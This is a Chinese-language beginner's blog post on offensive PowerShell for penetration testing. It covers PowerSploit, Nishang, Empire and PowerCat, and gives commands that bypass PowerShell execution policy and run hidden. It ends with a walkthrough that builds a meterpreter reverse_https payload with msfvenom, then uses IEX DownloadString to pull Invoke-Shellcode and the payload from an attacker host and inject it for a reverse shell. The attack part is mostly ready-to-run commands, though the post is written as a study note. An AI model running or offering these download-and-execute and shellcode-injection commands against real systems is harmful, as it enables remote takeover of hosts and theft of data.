本人小白，写这篇文章主要记录一下自己的PowerShell学习之路，大牛请绕道：https://www.anquanke.com/subject/id/90541

首先PowerShell的攻击工具有以下几种：

• PowerShell：这是众多PowerShell攻击工具中被广泛使用的PowerShell后期的漏洞利用框架，常用来进行信息探测，特权提升，凭证窃取，持久化等操作。
• Nishang：基于PowerShell的渗透测试专用工具，集成了框架，脚本和各种Payload，包含下载和执行，键盘记录，DNS，延时命令等脚本。
• Empire：基于PowerShell的远程控制木马，可以从凭证数据库中导出和跟踪凭证信息，常用于提供前期漏洞利用的集成模块，信息探测，凭证窃取，持久化控制。
• PowerCat：PowerShell版的NetCat，有着网络工具中的"瑞士军刀"美誉，它能通过TCP和UDP在网络中读取数据。通过与其他工具结合和重定向，读者可以在脚本中以多种方式使用它

各个操作系统对应的PowerShell版本可以使用Get-Host或者$PSVersionTable.PSVERSION命令查看：

如果要运行PowerShell脚本程序，必须用管理员权限将Restricted策略改成Unrestricted，所以在渗透时，就需要采用一些方法绕过策略来执行脚本，比如下面这三种：

• 绕过本地权限执上传xxx.ps1至目标服务器，在CMD环境下，在目标服务器本地执行该脚本，如下所示：

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

•  本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -Nonlnteractive -NoProfile -File xxx.ps1

 用IEX下载远程ps1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI IEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

参数说明：

• ExecutionPolicy Bypass：绕过执行安全策略，这个参数非常重要，在默认情况下，PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过这个参数，可以绕过一个安全保护规则。在渗透测试中，基本每一次运行PowerShell脚本时都要使用这个参数。
• WindowStyle Hidden：隐藏窗口。
• NoLogo：启动不显示版权标志的PowerShell。
• Nonlnteractive(-NonI)：非交互模式，PowerShell不为用户提供交互的提示。
• NoProfile(-NoP)：PowerShell控制台不加载当前用户的配置文件。
• Noexit执行后不退出Shell。这在使用键盘记录等脚本时非常重要。

PowerShell脚本在默认情况下无法直接执行，这时就可以使用上述三种方法绕过安全策略，运行PowerShell脚本。

PowerSploit

PowerShell是一款基于PowerShell的后渗透(Post-Exploitation)框架软件，其github地址为：https://github.com/PowerShellMafia/PowerSploit

这里通过kali下载安装，移动到/var/www/html 目录，开启apache服务，搭建一个建议的服务器：

介绍各模块的功能：

• AntivirusBypass：发现杀毒软件的查杀特征。
• CodeExecution：在目标主机上执行代码。
• Exfiltration：目标主机上的信息搜集工具。
• Mayhem：蓝屏等破坏性脚本。
• Persistence：后面脚本(持久性控制)。
• Recon：以目标主机为跳板进行内网信息侦察。
• ScriptModification：在目标主机上创建或修改脚本。

PowerShell 脚本攻击演示：

CodeExecution模块下的Invoke-Shellcode脚本常用于将ShellCode插入指定的进程ID或本地PowerShell中，下面介绍两种常用的反弹Meterpreter Shell方法：

1.直接执行ShellCode反弹Meterpreter Shell

首先在MSF里使用reverse_https模块进行监听：

使用msfvenom命令生成一个PowerShell脚本木马：

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.133 lport=4444 -f powershell -o /var/www/html/test 

接下来生成PowerShell脚本木马

在目标机器PowerShell下输入以下命令来下载该脚本：

IEX (New-Object Net.WebClient).DownloadString("http://192.168.0.133/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")

接着下载木马：

IEX (New-Object Net.WebClient).DownloadString("http://192.168.0.133/test")

接着在PowerShell下运行以下命令：

Invoke-Shellcode -Shellcode($buf) -Force

 现在返回MSF监听页面发现shell已经反弹成功